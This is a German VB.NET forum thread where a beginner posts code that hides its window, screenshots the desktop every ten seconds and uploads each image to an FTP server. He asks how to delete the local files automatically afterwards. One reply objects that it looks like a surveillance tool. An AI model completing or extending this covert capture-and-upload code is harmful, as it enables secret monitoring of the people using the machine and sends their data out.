Screenshots nach Upload löschen ?!

  • VB.NET

Es gibt 11 Antworten in diesem Thema. Der letzte Beitrag () ist von Manschula.

    Screenshots nach Upload löschen ?!

    Hey , also ich beschäftige mich erst seid kurzem mit VB , besitzte momentan auch nur die Express Version 2008 . Naja , also ich hab einfach mal etwas herum probiert und ausgetestet und habe mir jetzt schonmal ein Prog gecoded das alle 10 Sekunden(oder in anderen gewünschen Zeitabständen) einen Screen von meinem Desktop macht. Direkt danach wird die Datei auf meinen FTP Server geuploaded .
    Im Endeffekt soll es eine Art Überwachungstool sein/werden , aber ich habe keine Ahnung wie ich die Screens löschen lassen kann . Optimal wäre es wenn die Bilder direkt nach dem Upload automatisch gelöscht werden würden ! Quasi ein Screen wird erstellt , geuploaded , vom PC gelöscht und 10 Sekunden später kommt der neue Screen usw. Als Leihe bin ich zwar schon einigermaßen zufrieden mit dem bisherigen tool , aber es nervt einfach jedes mal die Bilder löschen zu müssen :/ .


    Hier mal mein Code :

    VB.NET-Quellcode

    1. Public Class Form1
    2. Dim a As String = Application.ExecutablePath
    3. Dim b As String = Environment.GetFolderPath(Environment.SpecialFolder.Startup) & "/" & IO.Path.GetFileName(a)
    4. Dim zahl As String = 1
    5. Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
    6. Me.Visible = False
    7. Me.Opacity = 0
    8. Me.ShowInTaskbar = False
    9. Me.Hide()
    10. End Sub
    11. Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
    12. Dim bounds As Rectangle
    13. Dim screenshot As System.Drawing.Bitmap
    14. Dim graph As Graphics
    15. bounds = Screen.PrimaryScreen.Bounds
    16. screenshot = New System.Drawing.Bitmap(bounds.Width, bounds.Height, System.Drawing.Imaging.PixelFormat.Format32bppArgb)
    17. graph = Graphics.FromImage(screenshot)
    18. graph.CopyFromScreen(bounds.X, bounds.Y, 0, 0, bounds.Size, CopyPixelOperation.SourceCopy)
    19. PictureBox1.Image = screenshot
    20. zahl += 1
    21. My.Settings.zahl = zahl
    22. My.Settings.Save()
    23. Try
    24. PictureBox1.Image.Save(zahl & ".gif", System.Drawing.Imaging.ImageFormat.Gif)
    25. My.Computer.Network.UploadFile(zahl & ".gif", "ftp-Server" & zahl + ".gif", "Username", "passwort")
    26. Catch ex As Exception
    27. End Try
    28. End Sub
    29. End Class



    Ich hoffe natürlich auf Hilfe eurerseits , aber ich wäre froh wenn ich nicht einfach nur wortlos einen Code hingeklatscht bekomme , würde auch gerne erklärt bekommen wie dieser dann funktioniert damit ich mir das einprägen und auch später mal wieder nutzten kann :) !

    PS:Wünsche allerseits einen guten Morgen :thumbsup: .


    LG MUGEN



    Edit : Momentan werden die Screens auf dem Pc dort erzeugt und gespeichert wo man die Datei ausführt .

    Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von „Mugen“ () aus folgendem Grund: Etwas vergessen :/

    Willkommen im Forum.
    Das sieht mir sehr nach einem Überwachungstool aus. :thumbdown:

    Edit by Dodo:
    -> Schriftgröße entfernt!
    Falls Du diesen Code kopierst, achte auf die C&P-Bremse.
    Jede einzelne Zeile Deines Programms, die Du nicht explizit getestet hast, ist falsch :!:
    Ein guter .NET-Snippetkonverter (der ist verfügbar).
    Programmierfragen über PN / Konversation werden ignoriert!

    Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von „Dodo“ ()

    Ja , aber der Pfad ist ja nicht festgelegt . Wenn jemand das Prog z.B in Eigene Dateien speichert , dann sind dort auch die Screens , wenn jemand hingegen das Prog auf dem Desktop benutzt sind sie dort usw.


    @RodFromGermany : Was genau stört dich an dem tool ? O.o Ich will nicht unverschämt sein , aber keine Antwort ist besser als deine Antwort ^^ . Ich experimentiere einfach ein wenig rum und da ich 2 Geschwister habe die beide meinen Pc benutzten halte ich das für eine gute Idee , davon mal abgesehen gibt es wohl schon mehr als genug Programme die für "NEGATIVE" Dinge genutzt werden . Darin besteht aber nicht meine Absicht -.- .......
    Finde es echt schade das man direkt in solch eine Schublade gesteckt wird !


    LG MUGEN

    Mugen schrieb:

    Finde es echt schade das man direkt in solch eine Schublade gesteckt wird !
    Ich stecke niemanden in eine Schublade, ich bin auch nicht nachtragend.
    Ich lese Deinen Post und schreibe meinen Kommentar dazu.
    -------------------------------------
    Richte für Deine Geschwister einen Login auf Deinem PC ein und gib ihnen die Rechte, die sie benötigen und verweigere ihnen die Rechte, mit denen sie Blödsinn machen könnten.
    Falls Du diesen Code kopierst, achte auf die C&P-Bremse.
    Jede einzelne Zeile Deines Programms, die Du nicht explizit getestet hast, ist falsch :!:
    Ein guter .NET-Snippetkonverter (der ist verfügbar).
    Programmierfragen über PN / Konversation werden ignoriert!
    Der Sinn einer Antwort die weder konstruktiv noch hilfreich ist liegt worin genau ? :) :P

    So , ich bin jetzt mal ab , habe ja meine Lösung gefunden und muss endlich mal schlafen .
    Wünsche euch allen einen schönen Tag , werde heute nach der Arbeit noch etwas im Forum stöbern .

    LG MUGEN

    Mugen schrieb:

    Der Sinn einer Antwort die weder konstruktiv noch hilfreich ist liegt worin genau ?

    RodFromGermany schrieb:

    Richte für Deine Geschwister einen Login auf Deinem PC ein und gib ihnen die Rechte, die sie benötigen und verweigere ihnen die Rechte, mit denen sie Blödsinn machen könnten.
    Es ist von Vorteil, lesen zu können. :D
    Falls Du diesen Code kopierst, achte auf die C&P-Bremse.
    Jede einzelne Zeile Deines Programms, die Du nicht explizit getestet hast, ist falsch :!:
    Ein guter .NET-Snippetkonverter (der ist verfügbar).
    Programmierfragen über PN / Konversation werden ignoriert!
    Hahaha sorry ^^ , hab das echt nicht mehr gelesen , dachte das gehört schon zu deiner sigi xD .
    Wäre eine Idee , aber hilft mir in Sachen VB irgendwie garnicht lol . Es ist ja nicht so als hätte ich mit VB angefangen da meine Geschwister so eine "Gefahr" für meine Daten darstellen .
    Ich habe einfach aus Spaß an der Sache gedacht ich tüftele mal ein bissien herum :) !

    Bis jetzt habe ich nur Kleinigkeiten gemacht , wie einen Taschenrechner , Minispiele , Datei-Uploader usw. Naja und letztendlich bin ich jetzt bei diesem Projekt gelandet (falls man das überhaupt schon Projekt nennen darf , aber für mich als Anfänger ist es eben eins ) .